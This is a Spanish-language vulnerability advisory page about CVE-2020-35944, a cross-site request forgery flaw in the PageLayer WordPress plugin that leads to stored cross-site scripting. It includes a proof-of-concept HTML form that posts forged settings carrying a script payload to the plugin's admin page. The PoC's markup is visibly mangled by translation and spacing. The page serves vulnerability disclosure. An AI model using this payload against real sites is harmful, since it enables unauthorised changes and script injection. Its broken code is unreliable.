Descripcion CVE-CVE-2020-35944 en clases ordenador

vulnerabilidad

Se descubrió un problema en el complemento PageLayer antes de la 1.1.2 para WordPress. La función pagelayer_settings_page es vulnerable a CSRF, que puede conducir a XSS.

Una vulnerabilidad clasificada como problemática fue encontrada en PageLayer Plugin hasta 1.1.1 en WordPress ( WordPress Plugin ). Esto afecta la función pagelayer_settings_page. A través de la manipulación con un input desconocido se causa una vulnerabilidad de clase cross site request forgery. CWE está clasificando el problema como CWE-352 . Esto tendrá un impacto en la integridad. Un atacante podría obligar a los usuarios legítimos a iniciar acciones no deseadas dentro de la aplicación web.

La debilidad se presentó el 01/01/2021. El aviso se comparte en wpscan.com . Esta vulnerabilidad se identifica de forma única como CVE-2020-35944 . Se dice que la explotabilidad es fácil. Es posible iniciar el ataque de forma remota. No se necesita ninguna forma de autenticación para la explotación. Exige que la víctima esté realizando algún tipo de interacción con el usuario. Se conocen detalles técnicos, pero no hay exploits disponibles.

Prueba de concepto

<html>

<cuerpo>

<form action = "http: // [sitio] /wp-admin/admin.php?page=pagelayer" method = "POST">

<input type = "hidden" name = "pl & # 95; soporte & # 95; ept & # 91; & # 93;" valor = "publicar" />

<input type = "hidden" name = "pl & # 95; soporte & # 95; ept & # 91; & # 93;" valor = "página" />

<input type = "hidden" name = "pagelayer & # 95; content & # 95; width" value = "" />

<input type = "hidden" name = "pagelayer & # 95; entre & # 95; widgets" value = "" />

<input type = "hidden" name = "pagelayer & # 95; body & # 95; font" value = "" />

<input type = "hidden" name = "pagelayer & # 95; tablet & # 95; breakpoint" value = "" />

<input type = "hidden" name = "pagelayer & # 95; mobile & # 95; breakpoint" value = "" />

<input type = "hidden" name = "pagelayer & # 95; íconos & # 95; set & # 91; & # 93;" value = "fuente & # 45; awesome5" />

<input type = "hidden" name = "pagelayer & # 45; address" value = "& lt; script & gt; alert & # 40; 0 & # 41; & lt; & # 47; script & gt;" />

<input type = "hidden" name = "pagelayer & # 45; phone" value = "& # 43; 1234567890" />

<input type = "hidden" name = "pagelayer & # 95; cf & # 95; to & # 95; email" value = "" />

<input type = "hidden" name = "submit" value = "Guardar & # 32; cambios" />

<input type = "submit" value = "Enviar solicitud" />

</form>

</body>

</html>

Referencias:

https://wpscan.com/vulnerability/10240

https://wpscan.com/vulnerability/10240

Gracias por visitar este sitio, espero que te haya gustado y vuelvas proximamente, compartela en las redes sociales, gracias

Compartir en Facebook Compartir en twitter

Semrush sigue a tu competencia

Fecha actualización el 2021-01-05. Fecha publicación el 2021-01-05. Categoría: vulnerabilidad Autor: Oscar olg Mapa del sitio Fuente: incibe